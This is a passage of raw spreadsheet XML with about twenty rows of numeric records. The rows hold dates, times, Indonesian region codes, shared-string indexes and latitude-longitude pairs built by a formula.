      <c r="X2989" t="s">
        <v>20880</v>
      </c>
      <c r="Y2989" t="str">
        <f t="shared" si="46"/>
        <v>-7.55987,112.12942</v>
      </c>
    </row>
    <row r="2990" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2990">
        <v>244716</v>
      </c>
      <c r="B2990" s="1">
        <v>44236</v>
      </c>
      <c r="C2990" s="2">
        <v>0.5835069444444444</v>
      </c>
      <c r="D2990" t="s">
        <v>22</v>
      </c>
      <c r="E2990" t="s">
        <v>23</v>
      </c>
      <c r="F2990" t="s">
        <v>10117</v>
      </c>
      <c r="G2990" t="s">
        <v>10118</v>
      </c>
      <c r="H2990" t="s">
        <v>26</v>
      </c>
      <c r="I2990" t="s">
        <v>7487</v>
      </c>
      <c r="J2990" t="s">
        <v>2627</v>
      </c>
      <c r="L2990" t="s">
        <v>10119</v>
      </c>
      <c r="M2990">
        <v>3213140016</v>
      </c>
      <c r="N2990">
        <v>3213140</v>
      </c>
      <c r="O2990">
        <v>3213</v>
      </c>
      <c r="P2990">
        <v>32</v>
      </c>
      <c r="Q2990" t="s">
        <v>10120</v>
      </c>
      <c r="R2990" t="s">
        <v>10120</v>
      </c>
      <c r="S2990" t="s">
        <v>5179</v>
      </c>
      <c r="T2990" t="s">
        <v>42</v>
      </c>
      <c r="U2990" s="5">
        <v>10781232</v>
      </c>
      <c r="V2990" s="5" t="s">
        <v>17139</v>
      </c>
      <c r="W2990" s="5">
        <v>-645441</v>
      </c>
      <c r="X2990" t="s">
        <v>20881</v>
      </c>
      <c r="Y2990" t="str">
        <f t="shared" si="46"/>
        <v>-6.45441,107.81232</v>
      </c>
    </row>
    <row r="2991" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2991">
        <v>245002</v>
      </c>
      <c r="B2991" s="1">
        <v>44236</v>
      </c>
      <c r="C2991" s="2">
        <v>0.64369212962962963</v>
      </c>
      <c r="D2991" t="s">
        <v>22</v>
      </c>
      <c r="E2991" t="s">
        <v>23</v>
      </c>
      <c r="F2991" t="s">
        <v>10121</v>
      </c>
      <c r="G2991" t="s">
        <v>10122</v>
      </c>
      <c r="H2991" t="s">
        <v>26</v>
      </c>
      <c r="I2991" t="s">
        <v>7595</v>
      </c>
      <c r="J2991" t="s">
        <v>9945</v>
      </c>
      <c r="L2991" t="s">
        <v>10123</v>
      </c>
      <c r="M2991">
        <v>3171080002</v>
      </c>
      <c r="N2991">
        <v>3171080</v>
      </c>
      <c r="O2991">
        <v>3171</v>
      </c>
      <c r="P2991">
        <v>31</v>
      </c>
      <c r="Q2991" t="s">
        <v>6986</v>
      </c>
      <c r="R2991" t="s">
        <v>1403</v>
      </c>
      <c r="S2991" t="s">
        <v>108</v>
      </c>
      <c r="T2991" t="s">
        <v>33</v>
      </c>
      <c r="U2991" s="5">
        <v>10685921</v>
      </c>
      <c r="V2991" s="5" t="s">
        <v>17140</v>
      </c>
      <c r="W2991" s="5">
        <v>-626007</v>
      </c>
      <c r="X2991" t="s">
        <v>20882</v>
      </c>
      <c r="Y2991" t="str">
        <f t="shared" si="46"/>
        <v>-6.26007,106.85921</v>
      </c>
    </row>
    <row r="2992" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2992">
        <v>246400</v>
      </c>
      <c r="B2992" s="1">
        <v>44237</v>
      </c>
      <c r="C2992" s="2">
        <v>2.3576388888888893E-2</v>
      </c>
      <c r="D2992" t="s">
        <v>22</v>
      </c>
      <c r="E2992" t="s">
        <v>23</v>
      </c>
      <c r="F2992" t="s">
        <v>10124</v>
      </c>
      <c r="H2992" t="s">
        <v>26</v>
      </c>
      <c r="I2992" t="s">
        <v>1843</v>
      </c>
      <c r="J2992" t="s">
        <v>10125</v>
      </c>
      <c r="L2992" t="s">
        <v>10126</v>
      </c>
      <c r="M2992">
        <v>3374090003</v>
      </c>
      <c r="N2992">
        <v>3374090</v>
      </c>
      <c r="O2992">
        <v>3374</v>
      </c>
      <c r="P2992">
        <v>33</v>
      </c>
      <c r="Q2992" t="s">
        <v>9690</v>
      </c>
      <c r="R2992" t="s">
        <v>1362</v>
      </c>
      <c r="S2992" t="s">
        <v>1334</v>
      </c>
      <c r="T2992" t="s">
        <v>1134</v>
      </c>
      <c r="U2992" s="5">
        <v>11047167</v>
      </c>
      <c r="V2992" s="5" t="s">
        <v>17141</v>
      </c>
      <c r="W2992" s="5">
        <v>-696272</v>
      </c>
      <c r="X2992" t="s">
        <v>20883</v>
      </c>
      <c r="Y2992" t="str">
        <f t="shared" si="46"/>
        <v>-6.96272,110.47167</v>
      </c>
    </row>
    <row r="2993" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2993">
        <v>246756</v>
      </c>
      <c r="B2993" s="1">
        <v>44237</v>
      </c>
      <c r="C2993" s="2">
        <v>0.29758101851851854</v>
      </c>
      <c r="D2993" t="s">
        <v>22</v>
      </c>
      <c r="E2993" t="s">
        <v>23</v>
      </c>
      <c r="F2993" t="s">
        <v>10127</v>
      </c>
      <c r="G2993" t="s">
        <v>10128</v>
      </c>
      <c r="H2993" t="s">
        <v>26</v>
      </c>
      <c r="I2993" t="s">
        <v>5440</v>
      </c>
      <c r="J2993" t="s">
        <v>3013</v>
      </c>
      <c r="L2993" t="s">
        <v>10129</v>
      </c>
      <c r="M2993">
        <v>1671021004</v>
      </c>
      <c r="N2993">
        <v>1671021</v>
      </c>
      <c r="O2993">
        <v>1671</v>
      </c>
      <c r="P2993">
        <v>16</v>
      </c>
      <c r="Q2993" t="s">
        <v>10130</v>
      </c>
      <c r="R2993" t="s">
        <v>10131</v>
      </c>
      <c r="S2993" t="s">
        <v>7547</v>
      </c>
      <c r="T2993" t="s">
        <v>1418</v>
      </c>
      <c r="U2993" s="5">
        <v>10475649</v>
      </c>
      <c r="V2993" s="5" t="s">
        <v>17142</v>
      </c>
      <c r="W2993" s="5">
        <v>-303667</v>
      </c>
      <c r="X2993" t="s">
        <v>20884</v>
      </c>
      <c r="Y2993" t="str">
        <f t="shared" si="46"/>
        <v>-3.03667,104.75649</v>
      </c>
    </row>
    <row r="2994" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2994">
        <v>246801</v>
      </c>
      <c r="B2994" s="1">
        <v>44237</v>
      </c>
      <c r="C2994" s="2">
        <v>0.33184027777777775</v>
      </c>
      <c r="D2994" t="s">
        <v>22</v>
      </c>
      <c r="E2994" t="s">
        <v>23</v>
      </c>
      <c r="F2994" t="s">
        <v>10132</v>
      </c>
      <c r="G2994" t="s">
        <v>10133</v>
      </c>
      <c r="H2994" t="s">
        <v>26</v>
      </c>
      <c r="I2994" t="s">
        <v>159</v>
      </c>
      <c r="J2994" t="s">
        <v>2627</v>
      </c>
      <c r="L2994" t="s">
        <v>10134</v>
      </c>
      <c r="M2994">
        <v>3213190006</v>
      </c>
      <c r="N2994">
        <v>3213190</v>
      </c>
      <c r="O2994">
        <v>3213</v>
      </c>
      <c r="P2994">
        <v>32</v>
      </c>
      <c r="Q2994" t="s">
        <v>1463</v>
      </c>
      <c r="R2994" t="s">
        <v>5178</v>
      </c>
      <c r="S2994" t="s">
        <v>5179</v>
      </c>
      <c r="T2994" t="s">
        <v>42</v>
      </c>
      <c r="U2994" s="5">
        <v>10782064</v>
      </c>
      <c r="V2994" s="5" t="s">
        <v>17137</v>
      </c>
      <c r="W2994" s="5">
        <v>-629224</v>
      </c>
      <c r="X2994" t="s">
        <v>20885</v>
      </c>
      <c r="Y2994" t="str">
        <f t="shared" si="46"/>
        <v>-6.29224,107.82064</v>
      </c>
    </row>
    <row r="2995" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2995">
        <v>246894</v>
      </c>
      <c r="B2995" s="1">
        <v>44237</v>
      </c>
      <c r="C2995" s="2">
        <v>0.41136574074074073</v>
      </c>
      <c r="D2995" t="s">
        <v>22</v>
      </c>
      <c r="E2995" t="s">
        <v>23</v>
      </c>
      <c r="F2995" t="s">
        <v>10135</v>
      </c>
      <c r="G2995" t="s">
        <v>10136</v>
      </c>
      <c r="H2995" t="s">
        <v>26</v>
      </c>
      <c r="I2995" t="s">
        <v>7595</v>
      </c>
      <c r="J2995" t="s">
        <v>2627</v>
      </c>
      <c r="L2995" t="s">
        <v>10137</v>
      </c>
      <c r="M2995">
        <v>3215072009</v>
      </c>
      <c r="N2995">
        <v>3215072</v>
      </c>
      <c r="O2995">
        <v>3215</v>
      </c>
      <c r="P2995">
        <v>32</v>
      </c>
      <c r="Q2995" t="s">
        <v>10138</v>
      </c>
      <c r="R2995" t="s">
        <v>9879</v>
      </c>
      <c r="S2995" t="s">
        <v>3979</v>
      </c>
      <c r="T2995" t="s">
        <v>42</v>
      </c>
      <c r="U2995" s="5">
        <v>10746238</v>
      </c>
      <c r="V2995" s="5" t="s">
        <v>17143</v>
      </c>
      <c r="W2995" s="5">
        <v>-638503</v>
      </c>
      <c r="X2995" t="s">
        <v>20886</v>
      </c>
      <c r="Y2995" t="str">
        <f t="shared" si="46"/>
        <v>-6.38503,107.46238</v>
      </c>
    </row>
    <row r="2996" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2996">
        <v>247262</v>
      </c>
      <c r="B2996" s="1">
        <v>44238</v>
      </c>
      <c r="C2996" s="2">
        <v>7.9745370370370369E-2</v>
      </c>
      <c r="D2996" t="s">
        <v>22</v>
      </c>
      <c r="E2996" t="s">
        <v>23</v>
      </c>
      <c r="F2996" t="s">
        <v>10139</v>
      </c>
      <c r="G2996" t="s">
        <v>10140</v>
      </c>
      <c r="H2996" t="s">
        <v>26</v>
      </c>
      <c r="I2996" t="s">
        <v>3116</v>
      </c>
      <c r="J2996" t="s">
        <v>2608</v>
      </c>
      <c r="L2996" t="s">
        <v>10141</v>
      </c>
      <c r="M2996">
        <v>3306070003</v>
      </c>
      <c r="N2996">
        <v>3306070</v>
      </c>
      <c r="O2996">
        <v>3306</v>
      </c>
      <c r="P2996">
        <v>33</v>
      </c>
      <c r="Q2996" t="s">
        <v>10142</v>
      </c>
      <c r="R2996" t="s">
        <v>10143</v>
      </c>
      <c r="S2996" t="s">
        <v>1133</v>
      </c>
      <c r="T2996" t="s">
        <v>1134</v>
      </c>
      <c r="U2996" s="5">
        <v>10995494</v>
      </c>
      <c r="V2996" s="5" t="s">
        <v>17144</v>
      </c>
      <c r="W2996" s="5">
        <v>-778676</v>
      </c>
      <c r="X2996" t="s">
        <v>20887</v>
      </c>
      <c r="Y2996" t="str">
        <f t="shared" si="46"/>
        <v>-7.78676,109.95494</v>
      </c>
    </row>
    <row r="2997" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2997">
        <v>247266</v>
      </c>
      <c r="B2997" s="1">
        <v>44238</v>
      </c>
      <c r="C2997" s="2">
        <v>0.28295138888888888</v>
      </c>
      <c r="D2997" t="s">
        <v>22</v>
      </c>
      <c r="E2997" t="s">
        <v>23</v>
      </c>
      <c r="F2997" t="s">
        <v>10144</v>
      </c>
      <c r="G2997" t="s">
        <v>10145</v>
      </c>
      <c r="H2997" t="s">
        <v>26</v>
      </c>
      <c r="I2997" t="s">
        <v>2300</v>
      </c>
      <c r="J2997" t="s">
        <v>2608</v>
      </c>
      <c r="L2997" t="s">
        <v>10146</v>
      </c>
      <c r="M2997">
        <v>3375040008</v>
      </c>
      <c r="N2997">
        <v>3375040</v>
      </c>
      <c r="O2997">
        <v>3375</v>
      </c>
      <c r="P2997">
        <v>33</v>
      </c>
      <c r="Q2997" t="s">
        <v>7338</v>
      </c>
      <c r="R2997" t="s">
        <v>7339</v>
      </c>
      <c r="S2997" t="s">
        <v>6246</v>
      </c>
      <c r="T2997" t="s">
        <v>1134</v>
      </c>
      <c r="U2997" s="5">
        <v>10968572</v>
      </c>
      <c r="V2997" s="5" t="s">
        <v>17145</v>
      </c>
      <c r="W2997" s="5">
        <v>-687675</v>
      </c>
      <c r="X2997" t="s">
        <v>20888</v>
      </c>
      <c r="Y2997" t="str">
        <f t="shared" si="46"/>
        <v>-6.87675,109.68572</v>
      </c>
    </row>
    <row r="2998" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2998">
        <v>247276</v>
      </c>
      <c r="B2998" s="1">
        <v>44239</v>
      </c>
      <c r="C2998" s="2">
        <v>0.32215277777777779</v>
      </c>
      <c r="D2998" t="s">
        <v>22</v>
      </c>
      <c r="E2998" t="s">
        <v>23</v>
      </c>
      <c r="F2998" t="s">
        <v>10147</v>
      </c>
      <c r="G2998" t="s">
        <v>10148</v>
      </c>
      <c r="H2998" t="s">
        <v>26</v>
      </c>
      <c r="I2998" t="s">
        <v>857</v>
      </c>
      <c r="J2998" t="s">
        <v>2622</v>
      </c>
      <c r="L2998" t="s">
        <v>10149</v>
      </c>
      <c r="M2998">
        <v>3509720005</v>
      </c>
      <c r="N2998">
        <v>3509720</v>
      </c>
      <c r="O2998">
        <v>3509</v>
      </c>
      <c r="P2998">
        <v>35</v>
      </c>
      <c r="Q2998" t="s">
        <v>1801</v>
      </c>
      <c r="R2998" t="s">
        <v>1801</v>
      </c>
      <c r="S2998" t="s">
        <v>6492</v>
      </c>
      <c r="T2998" t="s">
        <v>1221</v>
      </c>
      <c r="U2998" s="5">
        <v>11370502</v>
      </c>
      <c r="V2998" s="5" t="s">
        <v>17146</v>
      </c>
      <c r="W2998" s="5">
        <v>-817722</v>
      </c>
      <c r="X2998" t="s">
        <v>20889</v>
      </c>
      <c r="Y2998" t="str">
        <f t="shared" si="46"/>
        <v>-8.17722,113.70502</v>
      </c>
    </row>
    <row r="2999" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2999">
        <v>247277</v>
      </c>
      <c r="B2999" s="1">
        <v>44239</v>
      </c>
      <c r="C2999" s="2">
        <v>0.32743055555555556</v>
      </c>
      <c r="D2999" t="s">
        <v>22</v>
      </c>
      <c r="E2999" t="s">
        <v>23</v>
      </c>
      <c r="F2999" t="s">
        <v>10150</v>
      </c>
      <c r="G2999" t="s">
        <v>10151</v>
      </c>
      <c r="H2999" t="s">
        <v>26</v>
      </c>
      <c r="I2999" t="s">
        <v>788</v>
      </c>
      <c r="J2999" t="s">
        <v>2608</v>
      </c>
      <c r="L2999" t="s">
        <v>10152</v>
      </c>
      <c r="M2999">
        <v>3326161006</v>
      </c>
      <c r="N2999">
        <v>3326161</v>
      </c>
      <c r="O2999">
        <v>3326</v>
      </c>
      <c r="P2999">
        <v>33</v>
      </c>
      <c r="Q2999" t="s">
        <v>163</v>
      </c>
      <c r="R2999" t="s">
        <v>10153</v>
      </c>
      <c r="S2999" t="s">
        <v>6246</v>
      </c>
      <c r="T2999" t="s">
        <v>1134</v>
      </c>
      <c r="U2999" s="5">
        <v>10963609</v>
      </c>
      <c r="V2999" s="5" t="s">
        <v>17147</v>
      </c>
      <c r="W2999" s="5">
        <v>-688050</v>
      </c>
      <c r="X2999" t="s">
        <v>20890</v>
      </c>
      <c r="Y2999" t="str">
        <f t="shared" si="46"/>
        <v>-6.88050,109.63609</v>
      </c>
    </row>
    <row r="3000" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3000">
        <v>247278</v>
      </c>
      <c r="B3000" s="1">
        <v>44239</v>
      </c>
      <c r="C3000" s="2">
        <v>0.3880439814814815</v>
      </c>
      <c r="D3000" t="s">
        <v>22</v>
      </c>
      <c r="E3000" t="s">
        <v>23</v>
      </c>
      <c r="F3000" t="s">
        <v>10154</v>
      </c>
      <c r="G3000" t="s">
        <v>10155</v>
      </c>
      <c r="H3000" t="s">
        <v>26</v>
      </c>
      <c r="I3000" t="s">
        <v>1040</v>
      </c>
      <c r="J3000" t="s">
        <v>3013</v>
      </c>
      <c r="L3000" t="s">
        <v>10156</v>
      </c>
      <c r="M3000">
        <v>1671021004</v>
      </c>
      <c r="N3000">
        <v>1671021</v>
      </c>
      <c r="O3000">
        <v>1671</v>
      </c>
      <c r="P3000">
        <v>16</v>
      </c>
      <c r="Q3000" t="s">
        <v>10130</v>
      </c>
      <c r="R3000" t="s">
        <v>10131</v>
      </c>
      <c r="S3000" t="s">
        <v>7547</v>
      </c>
      <c r="T3000" t="s">
        <v>1418</v>
      </c>
      <c r="U3000" s="5">
        <v>10475644</v>
      </c>
      <c r="V3000" s="5" t="s">
        <v>17148</v>
      </c>
      <c r="W3000" s="5">
        <v>-303663</v>
      </c>
      <c r="X3000" t="s">
        <v>20891</v>
      </c>
      <c r="Y3000" t="str">
        <f t="shared" si="46"/>
        <v>-3.03663,104.75644</v>
      </c>
    </row>
    <row r="3001" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3001">
        <v>247279</v>
      </c>
      <c r="B3001" s="1">
        <v>44239</v>
      </c>
      <c r="C3001" s="2">
        <v>0.4458333333333333</v>
      </c>
      <c r="D3001" t="s">
        <v>2648</v>
      </c>
      <c r="E3001" t="s">
        <v>23</v>
      </c>
      <c r="G3001" t="s">
        <v>10157</v>
      </c>
      <c r="H3001" t="s">
        <v>26</v>
      </c>
      <c r="J3001" t="s">
        <v>629</v>
      </c>
      <c r="L3001" t="s">
        <v>2716</v>
      </c>
      <c r="M3001">
        <v>3174040007</v>
      </c>
      <c r="N3001">
        <v>3174040</v>
      </c>
      <c r="O3001">
        <v>3174</v>
      </c>
      <c r="P3001">
        <v>31</v>
      </c>
      <c r="Q3001" t="s">
        <v>389</v>
      </c>
      <c r="R3001" t="s">
        <v>377</v>
      </c>
      <c r="S3001" t="s">
        <v>32</v>
      </c>
      <c r="T3001" t="s">
        <v>33</v>
      </c>
      <c r="U3001" s="5">
        <v>10678589</v>
      </c>
      <c r="V3001" s="5" t="s">
        <v>17149</v>
      </c>
      <c r="W3001" s="5">
        <v>-614559</v>
      </c>
      <c r="X3001" t="s">
        <v>20892</v>
      </c>
      <c r="Y3001" t="str">
        <f t="shared" si="46"/>
        <v>-6.14559,106.78589</v>
      </c>
    </row>
    <row r="3002" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3002">
        <v>247284</v>
      </c>
      <c r="B3002" s="1">
        <v>44239</v>
      </c>
      <c r="C3002" s="2">
        <v>0.46469907407407413</v>
      </c>
      <c r="D3002" t="s">
        <v>22</v>
      </c>
      <c r="E3002" t="s">
        <v>23</v>
      </c>
      <c r="F3002" t="s">
        <v>10158</v>
      </c>
      <c r="G3002" t="s">
        <v>10159</v>
      </c>
      <c r="H3002" t="s">
        <v>26</v>
      </c>
      <c r="I3002" t="s">
        <v>3981</v>
      </c>
      <c r="J3002" t="s">
        <v>2622</v>
      </c>
      <c r="L3002" t="s">
        <v>10160</v>
      </c>
      <c r="M3002">
        <v>3509710006</v>
      </c>
      <c r="N3002">
        <v>3509710</v>
      </c>
      <c r="O3002">
        <v>3509</v>
      </c>
      <c r="P3002">
        <v>35</v>
      </c>
      <c r="Q3002" t="s">
        <v>6244</v>
      </c>
      <c r="R3002" t="s">
        <v>10161</v>
      </c>
      <c r="S3002" t="s">
        <v>6492</v>
      </c>
      <c r="T3002" t="s">
        <v>1221</v>
      </c>
      <c r="U3002" s="5">
        <v>11370525</v>
      </c>
      <c r="V3002" s="5" t="s">
        <v>17150</v>
      </c>
      <c r="W3002" s="5">
        <v>-817698</v>
      </c>
      <c r="X3002" t="s">
        <v>20893</v>
      </c>
      <c r="Y3002" t="str">
        <f t="shared" si="46"/>
        <v>-8.17698,113.70525</v>
      </c>
    </row>
    <row r="3003" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3003">
        <v>247299</v>
      </c>
      <c r="B3003" s="1">
        <v>44239</v>
      </c>
      <c r="C3003" s="2">
        <v>0.63670138888888894</v>
      </c>
      <c r="D3003" t="s">
        <v>22</v>
      </c>
      <c r="E3003" t="s">
        <v>23</v>
      </c>
      <c r="F3003" t="s">
        <v>10162</v>
      </c>
      <c r="G3003" t="s">
        <v>10163</v>
      </c>
      <c r="H3003" t="s">
        <v>26</v>
      </c>
      <c r="I3003" t="s">
        <v>137</v>
      </c>
      <c r="J3003" t="s">
        <v>2608</v>
      </c>
      <c r="L3003" t="s">
        <v>10164</v>
      </c>
      <c r="M3003">
        <v>3319030004</v>
      </c>
      <c r="N3003">
        <v>3319030</v>
      </c>
      <c r="O3003">
        <v>3319</v>
      </c>
      <c r="P3003">
        <v>33</v>
      </c>
      <c r="Q3003" t="s">
        <v>10101</v>
      </c>
      <c r="R3003" t="s">
        <v>889</v>
      </c>
      <c r="S3003" t="s">
        <v>7152</v>
      </c>
      <c r="T3003" t="s">
        <v>1134</v>
      </c>
      <c r="U3003" s="5">
        <v>11082156</v>
      </c>
      <c r="V3003" s="5" t="s">
        <v>17151</v>
      </c>
      <c r="W3003" s="5">
        <v>-684195</v>
      </c>
      <c r="X3003" t="s">
        <v>20894</v>
      </c>
      <c r="Y3003" t="str">
        <f t="shared" si="46"/>
        <v>-6.84195,110.82156</v>
      </c>
    </row>
    <row r="3004" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3004">
        <v>247300</v>
      </c>
      <c r="B3004" s="1">
        <v>44239</v>
      </c>
      <c r="C3004" s="2">
        <v>0.68534722222222222</v>
      </c>
      <c r="D3004" t="s">
        <v>22</v>
      </c>
      <c r="E3004" t="s">
        <v>23</v>
      </c>
      <c r="F3004" t="s">
        <v>10165</v>
      </c>
      <c r="G3004" t="s">
        <v>10166</v>
      </c>
      <c r="H3004" t="s">
        <v>26</v>
      </c>
      <c r="I3004" t="s">
        <v>1080</v>
      </c>
      <c r="J3004" t="s">
        <v>2608</v>
      </c>
      <c r="M3004">
        <v>3321040007</v>
      </c>
      <c r="N3004">
        <v>3321040</v>
      </c>
      <c r="O3004">
        <v>3321</v>
      </c>
      <c r="P3004">
        <v>33</v>
      </c>
      <c r="Q3004" t="s">
        <v>1453</v>
      </c>
      <c r="R3004" t="s">
        <v>1453</v>
      </c>
      <c r="S3004" t="s">
        <v>1428</v>
      </c>
      <c r="T3004" t="s">
        <v>1134</v>
      </c>
      <c r="U3004" s="5">
        <v>11049697</v>
      </c>
      <c r="V3004" s="5" t="s">
        <v>17152</v>
      </c>
      <c r="W3004" s="5">
        <v>-695165</v>
      </c>
      <c r="X3004" t="s">
        <v>20895</v>
      </c>
      <c r="Y3004" t="str">
        <f t="shared" si="46"/>
        <v>-6.95165,110.49697</v>
      </c>
    </row>
    <row r="3005" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3005">
        <v>247306</v>
      </c>
      <c r="B3005" s="1">
        <v>44240</v>
      </c>
      <c r="C3005" s="2">
        <v>0.18011574074074074</v>
      </c>
      <c r="D3005" t="s">
        <v>22</v>
      </c>
      <c r="E3005" t="s">
        <v>23</v>
      </c>
      <c r="F3005" t="s">
        <v>10167</v>
      </c>
      <c r="G3005" t="s">
        <v>10168</v>
      </c>
      <c r="H3005" t="s">
        <v>26</v>
      </c>
      <c r="I3005" t="s">
        <v>834</v>
      </c>
      <c r="J3005" t="s">
        <v>2627</v>
      </c>
      <c r="M3005">
        <v>3212180006</v>
      </c>
      <c r="N3005">
        <v>3212180</v>
      </c>
      <c r="O3005">
        <v>3212</v>
      </c>
      <c r="P3005">
        <v>32</v>
      </c>
      <c r="Q3005" t="s">
        <v>10169</v>
      </c>
      <c r="R3005" t="s">
        <v>10170</v>
      </c>
      <c r="S3005" t="s">
        <v>8471</v>
      </c>
      <c r="T3005" t="s">
        <v>42</v>
      </c>
      <c r="U3005" s="5">
        <v>10816685</v>
      </c>
      <c r="V3005" s="5" t="s">
        <v>17153</v>
      </c>
      <c r="W3005" s="5">
        <v>-640135</v>
      </c>
      <c r="X3005" t="s">
        <v>20896</v>
      </c>
      <c r="Y3005" t="str">
        <f t="shared" si="46"/>
        <v>-6.40135,108.16685</v>
      </c>
    </row>
    <row r="3006" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3006">
        <v>247307</v>
      </c>
      <c r="B3006" s="1">
        <v>44240</v>
      </c>
      <c r="C3006" s="2">
        <v>0.19686342592592596</v>
      </c>
      <c r="D3006" t="s">
        <v>22</v>
      </c>
      <c r="E3006" t="s">
        <v>23</v>
      </c>
      <c r="F3006" t="s">
        <v>10171</v>
      </c>
      <c r="G3006" t="s">
        <v>10172</v>
      </c>
      <c r="H3006" t="s">
        <v>26</v>
      </c>
      <c r="I3006" t="s">
        <v>771</v>
      </c>
      <c r="J3006" t="s">
        <v>10173</v>
      </c>
      <c r="L3006" t="s">
        <v>10174</v>
      </c>
      <c r="M3006">
        <v>3172050001</v>
      </c>
      <c r="N3006">
        <v>3172050</v>
      </c>
      <c r="O3006">
        <v>3172</v>
      </c>
      <c r="P3006">
        <v>31</v>
      </c>
      <c r="Q3006" t="s">
        <v>10175</v>
      </c>
      <c r="R3006" t="s">
        <v>358</v>
      </c>
      <c r="S3006" t="s">
        <v>49</v>
      </c>
      <c r="T3006" t="s">
        <v>33</v>
      </c>
      <c r="U3006" s="5">
        <v>10684745</v>
      </c>
      <c r="V3006" s="5" t="s">
        <v>17154</v>
      </c>
      <c r="W3006" s="5">
        <v>-628528</v>
      </c>
      <c r="X3006" t="s">
        <v>20897</v>
      </c>
      <c r="Y3006" t="str">
        <f t="shared" si="46"/>
        <v>-6.28528,106.84745</v>
      </c>
    </row>
    <row r="3007" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3007">
        <v>247308</v>
      </c>
      <c r="B3007" s="1">
        <v>44240</v>
      </c>
      <c r="C3007" s="2">
        <v>0.93180555555555555</v>
      </c>
      <c r="D3007" t="s">
        <v>22</v>
      </c>
      <c r="E3007" t="s">
        <v>23</v>
      </c>
      <c r="F3007" t="s">
        <v>10176</v>
      </c>
      <c r="H3007" t="s">
        <v>26</v>
      </c>
      <c r="I3007" t="s">
        <v>1909</v>
      </c>
      <c r="J3007" t="s">
        <v>2627</v>
      </c>
      <c r="L3007" t="s">
        <v>10177</v>
      </c>
      <c r="M3007">
        <v>3216070015</v>
      </c>
      <c r="N3007">
        <v>3216070</v>
      </c>
      <c r="O3007">
        <v>3216</v>
      </c>
      <c r="P3007">
        <v>32</v>
      </c>
      <c r="Q3007" t="s">
        <v>10178</v>
      </c>
      <c r="R3007" t="s">
        <v>5479</v>
      </c>
      <c r="S3007" t="s">
        <v>41</v>
      </c>
      <c r="T3007" t="s">
        <v>42</v>
      </c>
      <c r="U3007" s="5">
        <v>10714382</v>
      </c>
      <c r="V3007" s="5" t="s">
        <v>17155</v>
      </c>
      <c r="W3007" s="5">
        <v>-623758</v>
      </c>
      <c r="X3007" t="s">
        <v>20898</v>
      </c>
      <c r="Y3007" t="str">
        <f t="shared" si="46"/>
        <v>-6.23758,107.14382</v>
      </c>
    </row>
    <row r="3008" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3008">
        <v>247309</v>
      </c>
      <c r="B3008" s="1">
        <v>44241</v>
      </c>
      <c r="C3008" s="2">
        <v>4.5138888888888888E-2</v>
      </c>
      <c r="D3008" t="s">
        <v>2648</v>
      </c>
      <c r="E3008" t="s">
        <v>23</v>
      </c>
      <c r="G3008" t="s">
        <v>10179</v>
      </c>
      <c r="H3008" t="s">
        <v>26</v>
      </c>
      <c r="I3008" t="s">
        <v>608</v>
      </c>
      <c r="J3008" t="s">
        <v>10180</v>
      </c>
      <c r="L3008" t="s">
        <v>10181</v>
      </c>
      <c r="M3008">
        <v>3172030002</v>
      </c>
      <c r="N3008">
        <v>3172030</v>
      </c>
      <c r="O3008">
        <v>3172</v>
      </c>
      <c r="P3008">
        <v>31</v>
      </c>
      <c r="Q3008" t="s">
        <v>1534</v>
      </c>
      <c r="R3008" t="s">
        <v>228</v>
      </c>
      <c r="S3008" t="s">
        <v>49</v>
      </c>
      <c r="T3008" t="s">
        <v>33</v>
      </c>
      <c r="U3008" s="5">
        <v>10690542</v>
      </c>
      <c r="V3008" s="5" t="s">
        <v>17156</v>
      </c>
      <c r="W3008" s="5">
        <v>-633517</v>
      </c>
      <c r="X3008" t="s">
        <v>20899</v>
      </c>
      <c r="Y3008" t="str">
        <f t="shared" si="46"/>
        <v>-6.33517,106.90542</v>
      </c>
    </row>
    <row r="3009" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3009">
        <v>247345</v>
      </c>
      <c r="B3009" s="1">
        <v>44241</v>
      </c>
      <c r="C3009" s="2">
        <v>0.1653240740740741</v>
      </c>
      <c r="D3009" t="s">
        <v>22</v>
      </c>
      <c r="E3009" t="s">
        <v>23</v>
      </c>
      <c r="F3009" t="s">
        <v>10182</v>
      </c>
      <c r="G3009" t="s">
        <v>10183</v>
      </c>
      <c r="H3009" t="s">
        <v>7086</v>
      </c>
      <c r="I3009" t="s">
        <v>7087</v>
      </c>
      <c r="J3009" t="s">
        <v>7678</v>
      </c>
      <c r="M3009">
        <v>7271010007</v>
      </c>
      <c r="N3009">
        <v>7271010</v>
      </c>
      <c r="O3009">
        <v>7271</v>
      </c>
      <c r="P3009">
        <v>72</v>
      </c>
      <c r="Q3009" t="s">
        <v>10184</v>
      </c>
      <c r="R3009" t="s">
        <v>10185</v>
      </c>
      <c r="S3009" t="s">
        <v>10186</v>
      </c>
      <c r="T3009" t="s">
        <v>7683</v>
      </c>
      <c r="U3009" s="5">
        <v>11985013</v>
      </c>
      <c r="V3009" s="5" t="s">
        <v>17157</v>
      </c>
      <c r="W3009" s="5">
        <v>-89575</v>
      </c>
      <c r="X3009" t="s">
        <v>20900</v>
      </c>
      <c r="Y3009" t="str">
        <f t="shared" si="46"/>
        <v xml:space="preserve"> -0.89575,119.85013</v>
      </c>
    </row>
    <row r="3010" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3010">
        <v>247382</v>
      </c>
      <c r="B3010" s="1">
        <v>44241</v>
      </c>
      <c r="C3010" s="2">
        <v>0.28750000000000003</v>
      </c>
      <c r="D3010" t="s">
        <v>2648</v>
      </c>
      <c r="E3010" t="s">
        <v>23</v>
      </c>
      <c r="G3010" t="s">
